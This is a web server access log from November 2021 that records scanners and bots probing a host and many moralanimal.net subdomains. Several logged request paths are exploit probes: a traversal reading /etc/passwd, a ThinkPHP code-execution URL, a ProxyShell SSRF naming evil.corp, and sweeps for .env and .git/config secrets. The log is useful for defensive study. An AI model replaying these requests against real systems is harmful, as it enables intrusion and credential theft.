444 - GET https 64.22.31.253 "/" [Client 45.161.24.68] [Length 0] [Gzip -] "curl/7.58.0" "-" [14/Nov/2021:18:11:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Nov/2021:18:21:42 +0000] 400 - - http localhost "-" [Client 89.248.165.210] [Length 154] [Gzip -] "-" "-" [14/Nov/2021:19:24:31 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [14/Nov/2021:20:36:57 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [14/Nov/2021:20:36:57 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [14/Nov/2021:20:39:22 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Nov/2021:20:39:22 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Nov/2021:20:39:22 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Nov/2021:20:39:22 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Nov/2021:20:39:22 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Nov/2021:20:39:22 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Nov/2021:21:26:16 +0000] 400 - GET http 64.22.31.253 "/manager/text/list" [Client 192.241.208.45] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Nov/2021:22:30:19 +0000] 400 - GET http localhost "/" [Client 64.227.43.102] [Length 252] [Gzip -] "-" "-" [14/Nov/2021:22:51:39 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.209.157] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Nov/2021:01:37:20 +0000] 444 - GET https localhost "/" [Client 208.100.26.230] [Length 0] [Gzip -] "-" "-" [15/Nov/2021:01:37:20 +0000] 444 - OPTIONS https localhost "/" [Client 208.100.26.230] [Length 0] [Gzip -] "-" "-" [15/Nov/2021:01:37:20 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 208.100.26.230] [Length 0] [Gzip -] "-" "-" [15/Nov/2021:01:37:20 +0000] 400 - - https localhost "-" [Client 208.100.26.230] [Length 154] [Gzip -] "-" "-" [15/Nov/2021:01:37:25 +0000] 400 - - https localhost "-" [Client 208.100.26.230] [Length 0] [Gzip -] "-" "-" [15/Nov/2021:01:37:25 +0000] 400 - - https localhost "-" [Client 208.100.26.230] [Length 154] [Gzip -] "-" "-" [15/Nov/2021:01:37:25 +0000] 400 - - https localhost "-" [Client 208.100.26.230] [Length 154] [Gzip -] "-" "-" [15/Nov/2021:01:37:25 +0000] 400 - - https localhost "-" [Client 208.100.26.230] [Length 154] [Gzip -] "-" "-" [15/Nov/2021:01:37:25 +0000] 400 - - https localhost "-" [Client 208.100.26.230] [Length 154] [Gzip -] "-" "-" [15/Nov/2021:01:37:25 +0000] 400 - - https localhost "-" [Client 208.100.26.230] [Length 154] [Gzip -] "-" "-" [15/Nov/2021:01:37:26 +0000] 400 - - https localhost "-" [Client 208.100.26.230] [Length 154] [Gzip -] "-" "-" [15/Nov/2021:01:39:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.84.187.5] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [15/Nov/2021:01:39:09 +0000] 444 - POST https 64.22.31.253 "/sdk" [Client 208.100.26.230] [Length 0] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-" [15/Nov/2021:01:39:09 +0000] 400 - POST http 64.22.31.253 "/sdk" [Client 208.100.26.230] [Length 252] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-" [15/Nov/2021:01:39:09 +0000] 444 - GET https localhost "/" [Client 208.100.26.230] [Length 0] [Gzip -] "-" "-" [15/Nov/2021:01:39:09 +0000] 444 - GET https 64.22.31.253 "/nmaplowercheck1636940194" [Client 208.100.26.230] [Length 0] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-" [15/Nov/2021:01:39:09 +0000] 400 - GET http localhost "/" [Client 208.100.26.230] [Length 252] [Gzip -] "-" "-" [15/Nov/2021:01:39:09 +0000] 400 - GET http 64.22.31.253 "/nmaplowercheck1636940194" [Client 208.100.26.230] [Length 252] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-" [15/Nov/2021:01:39:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 208.100.26.230] [Length 0] [Gzip -] "-" "-" [15/Nov/2021:01:39:10 +0000] 444 - GET https 64.22.31.253 "/evox/about" [Client 208.100.26.230] [Length 0] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-" [15/Nov/2021:01:39:10 +0000] 400 - GET http 64.22.31.253 "/" [Client 208.100.26.230] [Length 252] [Gzip -] "-" "-" [15/Nov/2021:01:39:10 +0000] 400 - GET http 64.22.31.253 "/evox/about" [Client 208.100.26.230] [Length 252] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-" [15/Nov/2021:01:39:11 +0000] 444 - GET https 64.22.31.253 "/HNAP1" [Client 208.100.26.230] [Length 0] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-" [15/Nov/2021:01:39:12 +0000] 400 - GET http 64.22.31.253 "/HNAP1" [Client 208.100.26.230] [Length 252] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-" [15/Nov/2021:01:39:12 +0000] 444 - HEAD https 64.22.31.253 "/" [Client 208.100.26.230] [Length 0] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-" [15/Nov/2021:01:39:12 +0000] 400 - HEAD http 64.22.31.253 "/" [Client 208.100.26.230] [Length 0] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-" [15/Nov/2021:01:39:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 208.100.26.230] [Length 0] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-" [15/Nov/2021:01:39:13 +0000] 400 - GET http 64.22.31.253 "/" [Client 208.100.26.230] [Length 252] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-" [15/Nov/2021:02:00:41 +0000] 444 - POST https 64.22.31.253 "/mgmt/tm/util/bash" [Client 45.146.164.160] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [15/Nov/2021:02:15:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 216.218.206.67] [Length 0] [Gzip -] "-" "-" [15/Nov/2021:02:40:01 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.209.127] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Nov/2021:04:18:58 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.206.78] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Nov/2021:05:48:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [15/Nov/2021:06:48:10 +0000] 400 - - http localhost "-" [Client 87.251.64.90] [Length 154] [Gzip -] "-" "-" [15/Nov/2021:07:01:43 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Nov/2021:07:44:33 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.206.146] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Nov/2021:09:07:47 +0000] 400 - GET http 64.22.31.253 "/recordings" [Client 161.97.87.64] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" [15/Nov/2021:09:25:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 130.211.54.158] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [15/Nov/2021:09:32:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.194.198] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Nov/2021:10:13:22 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Nov/2021:10:39:45 +0000] 444 - GET https imap.moralanimal.net "/" [Client 92.118.160.5] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [15/Nov/2021:11:24:50 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Nov/2021:11:55:15 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.205.170] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Nov/2021:11:56:12 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 198.199.112.26] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Nov/2021:11:57:15 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.205.9] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Nov/2021:12:15:40 +0000] 400 - - http localhost "-" [Client 87.251.64.90] [Length 154] [Gzip -] "-" "-" [15/Nov/2021:12:32:30 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [15/Nov/2021:13:38:13 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Nov/2021:14:40:55 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Nov/2021:15:42:15 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Nov/2021:15:47:13 +0000] 444 - GET https 64.22.31.253 "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" [Client 45.146.164.160] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [15/Nov/2021:17:42:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Nov/2021:18:03:59 +0000] 444 - GET https 64.22.31.253 "/.git/config" [Client 45.9.239.98] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36" "-" [15/Nov/2021:18:16:45 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [15/Nov/2021:18:20:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Nov/2021:18:33:51 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp" [Client 45.146.164.160] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [15/Nov/2021:20:15:16 +0000] 444 - GET https localhost "/" [Client 45.79.136.161] [Length 0] [Gzip -] "-" "-" [15/Nov/2021:20:15:16 +0000] 444 - OPTIONS https localhost "/" [Client 45.79.136.161] [Length 0] [Gzip -] "-" "-" [15/Nov/2021:20:15:16 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 45.79.136.161] [Length 0] [Gzip -] "-" "-" [15/Nov/2021:20:15:16 +0000] 400 - - https localhost "-" [Client 45.79.136.161] [Length 154] [Gzip -] "-" "-" [15/Nov/2021:20:15:22 +0000] 400 - - https localhost "-" [Client 45.79.136.161] [Length 0] [Gzip -] "-" "-" [15/Nov/2021:20:15:22 +0000] 400 - - https localhost "-" [Client 45.79.136.161] [Length 154] [Gzip -] "-" "-" [15/Nov/2021:20:15:22 +0000] 400 - - https localhost "-" [Client 45.79.136.161] [Length 154] [Gzip -] "-" "-" [15/Nov/2021:20:15:22 +0000] 400 - - https localhost "-" [Client 45.79.136.161] [Length 154] [Gzip -] "-" "-" [15/Nov/2021:20:15:22 +0000] 400 - - https localhost "-" [Client 45.79.136.161] [Length 154] [Gzip -] "-" "-" [15/Nov/2021:20:15:22 +0000] 400 - - https localhost "-" [Client 45.79.136.161] [Length 154] [Gzip -] "-" "-" [15/Nov/2021:20:15:22 +0000] 400 - - https localhost "-" [Client 45.79.136.161] [Length 154] [Gzip -] "-" "-" [15/Nov/2021:20:34:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Nov/2021:20:35:03 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/nmaplowercheck1637008346" [Client 45.79.136.161] [Length 0] [Gzip -] "\x22Mozilla/5.0" "-" [15/Nov/2021:20:35:03 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/nmaplowercheck1637008346" [Client 45.79.136.161] [Length 252] [Gzip -] "\x22Mozilla/5.0" "-" [15/Nov/2021:20:35:03 +0000] 444 - HEAD https localhost "/" [Client 45.79.136.161] [Length 0] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330" "-" [15/Nov/2021:20:35:03 +0000] 400 - HEAD http localhost "/" [Client 45.79.136.161] [Length 0] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330" "-" [15/Nov/2021:20:35:03 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/HNAP1" [Client 45.79.136.161] [Length 0] [Gzip -] "\x22Mozilla/5.0" "-" [15/Nov/2021:20:35:03 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/HNAP1" [Client 45.79.136.161] [Length 252] [Gzip -] "\x22Mozilla/5.0" "-" [15/Nov/2021:22:55:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 139.162.207.84] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Nov/2021:22:56:06 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.203.62] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Nov/2021:23:37:46 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Nov/2021:23:37:46 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Nov/2021:23:37:46 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Nov/2021:23:37:46 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Nov/2021:23:37:46 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Nov/2021:23:37:46 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Nov/2021:00:54:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [16/Nov/2021:01:18:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 190.212.140.11] [Length 0] [Gzip -] "curl/7.58.0" "-" [16/Nov/2021:02:37:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.57] [Length 0] [Gzip -] "-" "-" [16/Nov/2021:02:37:44 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.57] [Length 252] [Gzip -] "-" "-" [16/Nov/2021:02:37:44 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [16/Nov/2021:04:07:18 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 34.96.130.29] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [16/Nov/2021:04:22:33 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https staging-api.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https pos.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https october.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https portal.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https store.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https manager.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https plugin.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https internal.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https rest.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https mobile.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https lms.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https uat.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https learn.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https wx.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https site.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https lara.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https order.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https sistema.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https office.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https play.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https v1.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https preprod.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:26 +0000] 444 - GET https v2.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:31 +0000] 444 - GET https secure.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:31 +0000] 444 - GET https shop.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:31 +0000] 444 - GET https invoice.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:31 +0000] 444 - GET https intranet.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:31 +0000] 444 - GET https webapp.moralanimal.net "/.env" [Client 185.225.39.112] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Nov/2021:04:35:31 